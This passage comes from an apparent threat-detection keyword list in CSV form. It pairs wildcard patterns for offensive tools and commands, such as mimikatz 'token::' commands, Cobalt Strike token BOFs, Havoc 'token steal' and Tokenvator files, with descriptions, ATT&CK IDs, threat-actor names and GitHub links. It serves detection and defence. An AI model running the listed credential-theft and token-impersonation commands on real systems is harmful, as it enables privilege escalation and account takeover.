- FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z 
-*to_powershell.ducky_script*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*toggle_privileges.cna*,offensive_tool_keyword,cobaltstrike,Syscall BOF to arbitrarily add/detract process token privilege rights.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Toggle_Token_Privileges_BOF,1,1,N/A,10,10,49,19,2021-09-14T18:50:42Z,2021-09-14T17:47:08Z -*toggle_privileges_bof.*,offensive_tool_keyword,cobaltstrike,Syscall BOF to arbitrarily add/detract process token privilege rights.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Toggle_Token_Privileges_BOF,1,1,N/A,10,10,49,19,2021-09-14T18:50:42Z,2021-09-14T17:47:08Z -*Toggle_Token_Privileges_BOF*,offensive_tool_keyword,cobaltstrike,Syscall BOF to arbitrarily add/detract process token privilege rights.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Toggle_Token_Privileges_BOF,1,1,N/A,10,10,49,19,2021-09-14T18:50:42Z,2021-09-14T17:47:08Z -*ToggleWDigest*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z 
-*Tojan:Win32/Goodkit*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*token find-tokens*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*token impersonate *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*token privs-get*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*token privs-list*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*token steal *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - 
T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*token* -CreateProcess * -ProcessId *,offensive_tool_keyword,AD exploitation cheat sheet,Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*token* -ImpersonateUser -Username *,offensive_tool_keyword,AD exploitation cheat sheet,Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*token::elevate*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*token::list*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*token::revert*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*token::run*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*token::whoami*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*TokenDump.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*TokenKidnapping.cpp*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*TokenKidnapping.cpp*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*TokenKidnapping.exe*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*tokenprivs.cpp*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*tokenprivs.exe*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*TokenStealing.cs*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*TokenStealing.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*TokenStomp.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*TokenStripBOF/src*,offensive_tool_keyword,cobaltstrike,Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nick-frischkorn/TokenStripBOF,1,1,N/A,10,10,28,5,2022-06-15T21:29:24Z,2022-06-15T02:13:13Z -*TokenTactics.psd1*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - 
TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*TokenTactics.psm1*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*TokenTactics-main.zip*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*Tokenvator*,offensive_tool_keyword,Tokenvator,A tool to alter privilege with Windows Tokens,T1055 - T1003 - T1134,TA0004 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator*.exe*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator.csproj*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator.exe*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator.git*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege 
Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator.pdb*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator.Plugins*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator.Resources*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator.sln*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator/MonkeyWorks*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*token-vault steal*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,0,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*token-vault.cna*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,1,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*token-vault.x64.o*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 
- T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,1,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*token-vault.x86.o*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
